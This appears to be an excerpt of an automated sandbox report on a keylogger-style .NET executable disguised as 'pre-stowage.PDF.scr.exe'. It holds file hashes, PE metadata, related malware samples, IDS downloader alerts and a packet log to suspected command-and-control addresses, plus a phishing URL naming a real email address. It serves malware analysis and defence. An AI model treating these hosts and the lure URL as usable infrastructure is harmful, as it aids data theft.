                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 172.67.177.134
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 172.67.177.134
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 172.67.177.134
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 172.67.177.134
                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                      • 172.67.177.134
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 172.67.177.134
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Brokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                      • 149.154.167.220
                                                                                                      No context
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2232
                                                                                                      Entropy (8bit):5.380805901110357
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:lGLHyIFKL3IZ2KRH9OugQs
                                                                                                      MD5:D0EF8E4DD120F790DD4A5434452024B2
                                                                                                      SHA1:2C48DCEC4D2B6914EC9D50CFD9C252F4ACA64E86
                                                                                                      SHA-256:8F8FB9D5320955882AC16C0025398A4443496B123BB532D92CFA80E78BB98497
                                                                                                      SHA-512:B1022D646EDFDFAD447992363C54EA5D270A8EEEFD2730BE56143BBB8B24945AC65D2AFCECC7600431362773921C8809B57A6364B8FF3C640B47FDF41B6E71EA
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.648475375844033
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      File name:pre-stowage.PDF.scr.exe
                                                                                                      File size:907'264 bytes
                                                                                                      MD5:68dfd91fce9ad3d728a7c25716990edd
                                                                                                      SHA1:6a6843531a77b77892813360b3daf0b0bbfea8c2
                                                                                                      SHA256:525248e53005e0ec5a39b4aa00c2323e9f5be5a256ddd944707aba1b3dedba58
                                                                                                      SHA512:cb16e579c818d63d4be0798211ef3d4f36728804280920d4508366d5a65c2c6c237452fc7cce112c8baba49f481b89c132e9accee541eab26424bfd80df63049
                                                                                                      SSDEEP:12288:GqktMolx2euSXxT4lfsvAt75PAXfZ0mA4t3Rx5Z5MpaXv0cWP2vMPku+l0CPP:gtZPpXStlaRNJJRb8pqvmPd+p
                                                                                                      TLSH:5F15CFC0373AB711CE6CA6708826EDB853652E787000F9E66DDE27D7759DB126A08F06
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag..............0.................. ........@.. .......................@............@................................
                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                      Entrypoint:0x4dea06
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x67611ABB [Tue Dec 17 06:31:23 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xde9b20x4f.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe00000x608.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xe20000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xdc7240x54.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000xdca0c0xdcc00b355b06e2f6c526301f98fa9c35b2d3bFalse0.8021272030719139data7.655601029073059IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xe00000x6080x800ddb1f1ce18116f9b87d75a2b775d8affFalse0.3359375data3.4231883972846804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xe20000xc0x20021038a50b0ab68924d1027218fa76bafFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_VERSION0xe00900x378data0.43355855855855857
                                                                                                      RT_MANIFEST0xe04180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-17T08:33:50.274773+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702193.122.130.080TCP
                                                                                                      2024-12-17T08:33:53.068957+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702193.122.130.080TCP
                                                                                                      2024-12-17T08:33:54.680510+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749706172.67.177.134443TCP
                                                                                                      2024-12-17T08:33:55.975234+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749713193.122.130.080TCP
                                                                                                      2024-12-17T08:33:58.850266+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749715193.122.130.080TCP
                                                                                                      2024-12-17T08:34:03.417453+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749718172.67.177.134443TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 17, 2024 08:33:48.656141043 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:48.775815010 CET8049702193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:48.776305914 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:48.776305914 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:48.896127939 CET8049702193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:49.875155926 CET8049702193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:49.911330938 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:50.031393051 CET8049702193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:50.231628895 CET8049702193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:50.274772882 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:50.968368053 CET49703443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:50.968429089 CET44349703172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:50.968497038 CET49703443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:50.980408907 CET49703443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:50.980441093 CET44349703172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:52.223654032 CET44349703172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:52.223742008 CET49703443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:52.240547895 CET49703443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:52.240570068 CET44349703172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:52.240890980 CET44349703172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:52.297657967 CET49703443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:52.339337111 CET44349703172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:52.666181087 CET44349703172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:52.666241884 CET44349703172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:52.666315079 CET49703443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:52.672358990 CET49703443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:52.677329063 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:52.797209978 CET8049702193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:53.016958952 CET8049702193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:53.019340038 CET49706443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:53.019368887 CET44349706172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:53.019490004 CET49706443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:53.019829035 CET49706443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:53.019845009 CET44349706172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:53.068957090 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:54.235225916 CET44349706172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:54.237714052 CET49706443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:54.237746000 CET44349706172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:54.680474997 CET44349706172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:54.680541039 CET44349706172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:54.680653095 CET49706443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:54.681637049 CET49706443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:54.685148001 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:54.686763048 CET4971380192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:54.805306911 CET8049702193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:54.806294918 CET4970280192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:54.806509972 CET8049713193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:54.806613922 CET4971380192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:54.806826115 CET4971380192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:54.926472902 CET8049713193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:55.926506996 CET8049713193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:55.928097010 CET49714443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:55.928126097 CET44349714172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:55.928389072 CET49714443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:55.928672075 CET49714443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:55.928683996 CET44349714172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:55.975234032 CET4971380192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:57.138197899 CET44349714172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:57.140100956 CET49714443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:57.140115976 CET44349714172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:57.583380938 CET44349714172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:57.583426952 CET44349714172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:57.583579063 CET49714443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:57.584146023 CET49714443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:57.588152885 CET4971380192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:57.589314938 CET4971580192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:57.708210945 CET8049713193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:57.708328009 CET4971380192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:57.708971977 CET8049715193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:57.709105015 CET4971580192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:57.709274054 CET4971580192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:33:57.828984022 CET8049715193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:58.806240082 CET8049715193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:33:58.807724953 CET49716443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:58.807760000 CET44349716172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:58.807833910 CET49716443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:58.808104992 CET49716443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:33:58.808118105 CET44349716172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:33:58.850265980 CET4971580192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:00.017544031 CET44349716172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:00.019973040 CET49716443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:00.019996881 CET44349716172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:00.464212894 CET44349716172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:00.464271069 CET44349716172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:00.464334011 CET49716443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:00.464886904 CET49716443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:00.479341984 CET4971780192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:00.599065065 CET8049717193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:00.599230051 CET4971780192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:00.599440098 CET4971780192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:00.719105005 CET8049717193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:01.695772886 CET8049717193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:01.740904093 CET4971780192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:01.759088039 CET49718443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:01.759128094 CET44349718172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:01.759181023 CET49718443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:01.759712934 CET49718443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:01.759737968 CET44349718172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:02.970083952 CET44349718172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:02.971951008 CET49718443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:02.971987963 CET44349718172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:03.417474985 CET44349718172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:03.417541027 CET44349718172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:03.417675018 CET49718443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:03.418179035 CET49718443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:03.422792912 CET4971780192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:03.424010038 CET4972180192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:03.543050051 CET8049717193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:03.543128014 CET4971780192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:03.544073105 CET8049721193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:03.544282913 CET4972180192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:03.544388056 CET4972180192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:03.664200068 CET8049721193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:04.640063047 CET8049721193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:04.641522884 CET49723443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:04.641611099 CET44349723172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:04.641695976 CET49723443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:04.642004013 CET49723443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:04.642038107 CET44349723172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:04.694175959 CET4972180192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:05.851910114 CET44349723172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:05.854206085 CET49723443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:05.854242086 CET44349723172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:06.675565958 CET44349723172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:06.675647974 CET44349723172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:06.675714970 CET49723443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:06.687594891 CET49723443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:06.710133076 CET4972180192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.714006901 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.830214024 CET8049721193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:06.830363035 CET4972180192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.833838940 CET8049724193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:06.833935022 CET4972480192.168.2.7193.122.130.0
